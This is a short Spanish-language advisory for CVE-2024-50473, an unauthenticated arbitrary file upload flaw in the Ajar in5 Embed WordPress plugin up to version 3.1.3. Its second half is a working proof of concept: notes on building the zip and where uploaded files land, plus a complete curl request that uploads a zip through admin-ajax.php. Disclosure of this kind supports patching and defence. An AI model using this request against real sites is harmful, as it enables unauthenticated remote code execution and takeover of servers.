
Ajar in5 Embed <= 3.1.3 - Carga de archivos arbitraria sin autenticación
Ajar in5 Embed <= 3.1.3 - Carga de archivos arbitrarios no autenticada
El plugin Ajar in5 Embed para WordPress es vulnerable a cargas de archivos arbitrarios debido a la falta de validación del tipo de archivo en todas las versiones hasta la 3.1.3 inclusive. Esto permite que atacantes no autenticados suban archivos arbitrarios en el servidor del sitio afectado, lo que puede posibilitar la ejecución remota de código.
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50473
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: ajar-productions-in5-embed
Nota: El archivo zip debe contener un index.html, aunque esté vacío, y se obtendrá un error 500, lo cual es normal.
Los archivos subidos se encontrarán en /wp-content/uploads/2024/php5/ - php5 es el nombre del archivo zip sin la extensión.
curl -X POST "http://kubernetes.docker.internal/wp-admin/admin-ajax.php?action=in5&in5=upload" \
-H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0" \
-H "Accept: application/json, text/javascript, */*; q=0.01" \
-H "Accept-Language: en-US,en;q=0.5" \
-H "Accept-Encoding: gzip, deflate, br" \
-H "Referer: http://kubernetes.docker.internal/wp-admin/post.php?post=4142&action=edit" \
-H "X-Requested-With: XMLHttpRequest" \
-H "Content-Type: multipart/form-data" \
-F "customPath=wp-content/uploads/2024/" \
-F "files[]=@/path/to/php5.zip" \
--compressed